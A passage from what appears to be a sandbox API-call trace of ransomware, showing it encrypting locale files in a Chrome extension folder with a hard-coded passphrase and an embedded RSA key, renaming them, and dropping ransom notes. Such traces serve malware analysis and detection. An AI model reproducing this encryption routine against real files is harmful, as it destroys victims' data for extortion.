"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.fuck")) returned 1 [0257.627] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.627] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.627] CryptReleaseContext (hProv=0x2e78f38, dwFlags=0x0) returned 1 [0257.627] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.627] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.627] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\readme_back_files.htm")) returned 0xffffffff [0257.628] AreFileApisANSI () returned 1 [0257.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.628] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.628] GetFileType (hFile=0x5d50) returned 0x1 [0257.629] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.630] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.630] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0257.630] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.630] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.630] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.630] GetLastError () returned 0x0 [0257.630] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json")) returned 0x20 [0257.631] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json", dwFileAttributes=0x80) returned 1 [0257.631] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.632] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.634] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.635] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79d08) returned 1 [0257.638] CryptCreateHash (in: hProv=0x2e79d08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.638] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.638] CryptHashData (hHash=0x2e18128, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.638] CryptDeriveKey (in: hProv=0x2e79d08, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.638] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.638] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.638] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79620) returned 1 [0257.638] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79620, dwCertEncodingType=0x1, pInfo=0x2e24330*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24360*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24368*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19828) returned 1 [0257.639] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.639] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78e28*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e78e28*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.639] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e78e28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e78e28*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.640] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xcb, lpOverlapped=0x0) returned 1 [0257.645] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xcb, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.645] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.645] CloseHandle (hObject=0x5d60) returned 1 [0257.645] CloseHandle (hObject=0x5d5c) returned 1 [0257.645] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json"), bFailIfExists=0) returned 1 [0257.649] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json", dwFileAttributes=0x0) returned 1 [0257.649] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.gsg")) returned 1 [0257.651] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\messages.json.fuck")) returned 1 [0257.652] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.652] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.652] CryptReleaseContext (hProv=0x2e79d08, dwFlags=0x0) returned 1 [0257.652] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.652] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0257.652] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\readme_back_files.htm")) returned 0xffffffff [0257.652] AreFileApisANSI () returned 1 [0257.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.653] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.654] GetFileType (hFile=0x5d50) returned 0x1 [0257.654] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.655] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.655] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0257.656] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.656] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.656] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.656] GetLastError () returned 0x0 [0257.656] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json")) returned 0x20 [0257.657] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json", dwFileAttributes=0x80) returned 1 [0257.657] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.658] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.659] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.660] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79ae8) returned 1 [0257.662] CryptCreateHash (in: hProv=0x2e79ae8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.662] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.662] CryptHashData (hHash=0x2e18128, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.662] CryptDeriveKey (in: hProv=0x2e79ae8, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.662] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.662] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.662] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79d08) returned 1 [0257.663] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79d08, dwCertEncodingType=0x1, pInfo=0x2e24670*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e246a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e246a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29384f8) returned 1 [0257.663] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.663] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78da0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e78da0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.663] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e78da0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e78da0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.664] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x20b, lpOverlapped=0x0) returned 1 [0257.665] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x20b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x210) returned 1 [0257.665] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x210, lpOverlapped=0x0) returned 1 [0257.728] CloseHandle (hObject=0x5d5c) returned 1 [0257.728] CloseHandle (hObject=0x5d60) returned 1 [0257.728] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json"), bFailIfExists=0) returned 1 [0257.731] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json", dwFileAttributes=0x0) returned 1 [0257.732] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.gsg")) returned 1 [0257.733] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\messages.json.fuck")) returned 1 [0257.733] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.733] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.733] CryptReleaseContext (hProv=0x2e79ae8, dwFlags=0x0) returned 1 [0257.733] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.734] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0257.734] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\readme_back_files.htm")) returned 0xffffffff [0257.734] AreFileApisANSI () returned 1 [0257.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.734] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ne\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.734] GetFileType (hFile=0x5d50) returned 0x1 [0257.734] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.735] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.735] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0257.736] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.736] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.736] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.736] GetLastError () returned 0x0 [0257.736] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\messages.json")) returned 0x20 [0257.736] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 